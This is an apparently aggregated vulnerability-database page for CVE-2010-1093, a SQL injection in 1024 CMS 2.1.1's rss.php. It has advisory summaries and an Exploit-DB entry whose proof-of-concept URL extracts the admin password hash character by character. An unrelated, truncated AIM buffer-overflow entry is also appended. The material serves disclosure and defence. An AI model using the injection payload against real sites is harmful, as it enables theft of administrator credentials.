CVE-2010-1093
Published 2010-03-24
CVE-2010-1093: SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the…
Priority: P338 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.88% (54.6th percentile)
SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a vp action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 1024cms | 1024_cms | — | — |
VulDB
1024 CMS 2.1.1 rss.php ID sql injection (EDB-14942 / BID-38476)
vuldb·2026-05-03·CVSS 6.8
CVE-2010-1093 [MEDIUM] 1024 CMS 2.1.1 rss.php ID sql injection (EDB-14942 / BID-38476)
A vulnerability described as critical has been identified in 1024 CMS 2.1.1. This vulnerability affects unknown code of the file rss.php. Executing a manipulation of the argument ID can lead to sql injection.
This vulnerability is registered as CVE-2010-1093. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-6r8x-4f4r-3rrj: SQL injection vulnerability in rss
ghsa_unreviewed·2022-05-02
CVE-2010-1093 [MEDIUM] CWE-89 GHSA-6r8x-4f4r-3rrj: SQL injection vulnerability in rss
SQL injection vulnerability in rss.php in 1024 CMS 2.1.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter in a vp action.
No detection rules found.
Exploit-DB
1024 CMS 2.1.1 - Blind SQL Injection
exploitdb·2010-09-07
CVE-2010-1093 1024 CMS 2.1.1 - Blind SQL Injection
---
# Exploit Title: 1024cms 2.1.1 Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // Solidmedia.de
# Software Website: http://1024cms.org
# Software Link: http://d10xg45o6p6dbl.cloudfront.net/projects/f/freecms1024/1024_v2.zip or http://sourceforge.net/projects/cms-cvi/files/v2.1.zip/download
# Version: 2.1.1
[ Vulnerability//PoC ]
http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='[first character of admin hash]
example: http://[site]/[path]/rss.php?t=vp&id=1'+AND+(SELECT+MID(o.password,1,1)+FROM+otatf_users+o+WHERE+o.id=1)='c
Exploit-DB
AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
exploitdb·2000-12-12
CVE-2000-1093 AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/2118/info
AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters.
This vulnerability exists in versions of AOL Instant Messenger previous to 4.3.2229. By sending a specially crafted URL, using the 'aim:' protocol, comprised of 'goim' and 'screenname' parameters, it is possible for a remote user to overflow the buffer during a memory copy operation and execute arbitrary code.
It should be noted that the victim nee
No writeups or analysis indexed.